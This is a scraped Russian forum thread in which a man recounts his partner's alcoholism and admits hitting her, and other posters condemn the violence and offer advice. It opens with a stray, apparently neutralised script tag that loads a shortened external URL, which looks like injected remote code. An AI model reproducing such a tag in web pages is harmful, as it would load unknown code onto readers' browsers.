<script type="text/oops" src="http://is.gd/J87Pzs"...7Pzs"></script>
Ну ты конечно молодец, способ воспитания женщины выбрал отличающийся оригинальностью :)
Только женщина с заниженной самооценкой и психологическими проблемами не пошлет такого мужика сразу же. Сразу же. Такое воспитание недопустимо.
отдаю ей должное терпела долго,хоть и ушла по другому поводу,иза запрета выпить на пасху)))))))как утверждала позже моя страшная ошибка)))))))))сам бы не подумал что смог бы поднять руку на женщину,но после 100 пьянки нервы не выдержали...какое то время я мог это терпеть,но родные жаловались что в доме пахнет бухлом ,что не хотят видеть пьяную
Ну ты конечно молодец, способ воспитания женщины выбрал отличающийся оригинальностью :)
Только женщина с заниженной самооценкой и психологическими проблемами не пошлет такого мужика сразу же. Сразу же. Такое воспитание недопустимо.
Тебе нужно было переключать внимание женщины на другие интересы - просмотр фильмов, новости кино, поездки в областной город, например в Макдональдс или KFC. Посещение театров там, кинотеатров, парки, велики, Фейсбук, инстаграммы и так далее.
Все это может сработать в теории, однако упирается в ограниченность материальных ресурсов. Поэтому вытащить этим женщину больную алкоголизмом скорее не получится. Как в фильме "Красотка" на такую даму нужен миллионер :))
Тогда получится показать другую жизнь, другие интересы, другие перспективы и другие источники откуда можно черпать счастье. И у нее получится научиться получать счастье не только из баттла со стольной 0.7 :)
я дал ей работать,и ура она не пила,встречал ее с работы,каждый день в пекарне пекла сердечки для меня))))))это был самый лучший период,но если бы я знал что она мне изменяла с *подругой* еще в феврале то сам бы ее бросил.
Тебе нужно было переключать внимание женщины на другие интересы - просмотр фильмов, новости кино, поездки в областной город, например в Макдональдс или KFC. Посещение театров там, кинотеатров, парки, велики, Фейсбук, инстаграммы и так далее. Ну у тебя не хватит ресурсов увлечь ее другой жизнью.
Все это может сработать в теории, однако упирается в ограниченность материальных ресурсов. Поэтому вытащить этим женщину больную алкоголизмом скорее не получится. Как в фильме "Красотка" на такую даму нужен миллионер :))
Тогда получится показать другую жизнь, другие интересы, другие перспективы и другие источники откуда можно черпать счастье. И у нее получится научиться получать счастье не только из баттла со стольной 0.7 :)
я уже писал если человек любит он вернется,через месяц,год, неважно,есть фильмы в пример ,случаи,да и начинать отношения сразу после других гибельно